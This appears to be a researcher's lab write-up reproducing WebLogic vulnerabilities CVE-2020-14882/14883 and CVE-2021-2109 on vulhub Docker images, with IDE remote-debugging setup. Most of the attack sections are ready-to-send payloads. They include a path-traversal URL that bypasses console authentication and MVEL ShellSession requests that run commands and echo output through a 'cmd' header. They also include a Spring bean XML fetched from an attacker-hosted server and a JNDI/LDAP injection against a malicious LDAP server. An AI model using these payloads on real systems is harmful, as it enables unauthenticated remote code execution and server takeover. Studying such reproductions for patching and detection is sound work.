Reproducing several high-severity WebLogic CVEs

Remote Debug

Preparing the remote debugging environment

  • IDEA
  • A local copy of the remote WebLogic installation directory
  • A local JDK of the same version as the remote one
  • Remote debugging enabled on the server, with the debug port configured
  • A Remote JVM Debug configuration set up in IDEA

Here I used the 10.3.6 Docker image, with JDK 1.6.0_45.

  1. Inside the container, enable remote debugging. Edit /root/Oracle/Middleware/user_projects/domains/base_domain/bin/setDomainEnv.sh and, around line 343, add:
     JAVA_DEBUG="true"
     export JAVA_DEBUG
     debugFlag="true"
     export debugFlag
     Then restart the container.
  2. Pull the whole tree out of the container, then gather every jar into a test folder:
     docker cp weblogic:/root ./weblogic_jars
     mkdir test
     sudo find ./ -name '*.jar' -exec cp {} ./test/ \;
     (Quote the *.jar pattern, otherwise the shell expands it before find sees it.) After tidying up, the layout is:
  • weblogic_docker
    • jdk (the JDK version from the container)
    • Oracle (the entire WebLogic installation, i.e. the project code)
    • test (all the jars)
  3. Open weblogic_docker in IDEA. Under Edit Configurations, add a Remote JVM Debug in the top left and set Host and Port (8453). Then in Project Structure set the JDK version and add the test folder under Libraries. Click Debug; if the console shows
     Connected to the target VM, address: '192.168.112.129:8453', transport: 'socket'
     the connection succeeded. The jars now open and the debugging environment is ready.

CVE-2020-14882 / CVE-2020-14883

Environment setup

The reproduction uses the vulhub Docker images directly; versions:

Docker image                       Java version
vulhub/weblogic:12.2.1.3-2018      1.8.0_151
vulhub/weblogic:10.3.6.0-2017      1.6.0_45

POC

Unauthenticated console access (works on both 10.3.6 and 12.2.1.3)

http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

RCE via GET (12.2.1.3)

http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch /tmp/succ%27);%22);

RCE via POST (12.2.1.3)

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");

RCE via GET with command output (12.2.1.3)

GET /console/css/%252e%252e%252fconsolejndi.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if (cmd != null) {String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();res.getWriter().write("");}executeThread.interrupt();"); HTTP/1.1
Host: 192.168.112.129:7001
cmd: ls
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

RCE via POST with command output (12.2.1.3)

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
cmd: id&&whoami
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1208

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if (cmd != null) {String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();res.getWriter().write("");}executeThread.interrupt();");

RCE by loading a Spring bean XML

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
   <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
       <constructor-arg>
         <list>
           <value>cmd</value>
           <value>/c</value>
           <value><![CDATA[dir]]></value>
         </list>
       </constructor-arg>
   </bean>
</beans>

On Linux use bash -c in place of cmd /c.

Making the console load the XML file (hosted on an attacker-controlled HTTP server):

http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.0.1/rce.xml")

CVE-2021-2109

Environment

  • WebLogic 10.3.6.0 in Docker
  • JDK 1.6.0_45
  • IntelliJ IDEA 2020.3.1 (Ultimate Edition), runtime 11.0.9.1+11-b1145.63 amd64

POC

JNDIExploit serves as the malicious LDAP server: https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

Start it on the attacker host (-i is the address the target will connect back to):

java -jar JNDIExploit-v1.11.jar -i 192.168.112.129

POST /console/css/%252e%252e%252fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.112;129:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.204.131:49163
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
cmd: ipconfig
Cookie: ADMINCONSOLESESSION=nM8lXW3nshhqyFuWs47qjIiQP0tUMtRYRHbBUFDXA8QIxRpdyNqr!964275826
Upgrade-Insecure-Requests: 1

Debug

Start the Remote JVM Debug session in IDEA.

First, find where the command actually gets executed. I started a Python http.server and used a curl against it as the command, so the request shows up the moment execution happens; it turns out to be in:

\server\lib\consoleapp\webapp\WEB-INF\lib\console.jar!\com\bea\console\actions\jndi\JNDIBindingAction.class

at line 57:

Object boundObj = c.lookup(context + "." + bindName);
// context = "ldap://192.168.112"
// bindname = "129:1389/Basic/WeblogicEcho"
-----------------------------------------------
public ClassLoader getContextClassLoader() {
       return this.contextClassLoader;
  }
//weblogic_jars\test\wlthint3client.jar!\weblogic\work\ExecuteThread.class
------------------------------------------------
protected Object childValue(Object var1) {
           return ((ResettableThreadLocal.ThreadStorage)var1).createChildCopy();
      }
//weblogic_jars\test\wlclient.jar!\weblogic\kernel\FinalThreadLocal.class
----------------------------------------------------
protected Object childValue(Object var1) {
           Thread var2 = Thread.currentThread();
           if (var2 instanceof AuditableThread) {
               return new FinalThreadLocal.FinalThreadStorage(((AuditableThread)var2).finalThreadStorage);
          }

Stepping further in: I can't make sense of it!
